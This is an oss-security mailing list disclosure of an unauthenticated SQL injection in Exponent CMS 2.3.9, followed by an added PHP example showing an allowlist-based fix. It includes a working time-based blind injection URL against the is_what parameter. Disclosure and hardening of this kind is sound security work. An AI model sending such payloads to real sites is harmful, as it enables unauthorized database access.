Date: Mon, 19 Sep 2016 13:46:34 +0800
From: east wu <ylgaaaaa@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: Exponent CMS 2.3.9 SQL injection vulnerabilities

https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L172

The 'is_what' parameter there has an injection without login.


https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559

$this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE " . $where);

POC:
/index.php?controller=address&action=activate_address&is_what=address1=(select
* from (select sleep(5))x)%23&id=1
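
A hardened form of the UPDATE quoted above, as an added example that is not part of the original post and is not Exponent CMS code. It assumes, as the PoC suggests, that the request parameter ends up as the column name; the function, table and column names are hypothetical.

```php
<?php
// Added illustration, not Exponent CMS code.
// clearFlag(), exp_addresses and the is_* columns are hypothetical names.

// Columns a caller may reset; anything else is rejected before SQL is built.
const FLAG_COLUMNS = ['is_default', 'is_billing', 'is_shipping'];

function clearFlag(PDO $pdo, string $prefix, string $col, int $userId): int
{
    // Identifiers cannot be bound as parameters, so the column name is
    // compared (strictly) against a fixed list instead of being escaped.
    if (!in_array($col, FLAG_COLUMNS, true)) {
        throw new InvalidArgumentException('unexpected column name');
    }
    // $col is now one of our own literals; $prefix is assumed to come from
    // site configuration, never from the request. The WHERE value is bound.
    $sql = "UPDATE {$prefix}addresses SET {$col} = 0 WHERE user_id = :uid";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':uid' => $userId]);
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE exp_addresses (
    id INTEGER PRIMARY KEY, user_id INTEGER,
    is_default INTEGER, is_billing INTEGER, is_shipping INTEGER)');
$pdo->exec('INSERT INTO exp_addresses
    (user_id, is_default, is_billing, is_shipping)
    VALUES (1, 1, 1, 0), (1, 0, 0, 1), (2, 1, 1, 1)');

// Legitimate call: the column is on the list.
echo clearFlag($pdo, 'exp_', 'is_billing', 1), " row(s) updated\n";

// A value shaped like the PoC (expression plus trailing comment) is refused
// before any statement is prepared.
try {
    clearFlag($pdo, 'exp_', 'is_billing=(select 1)#', 1);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```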
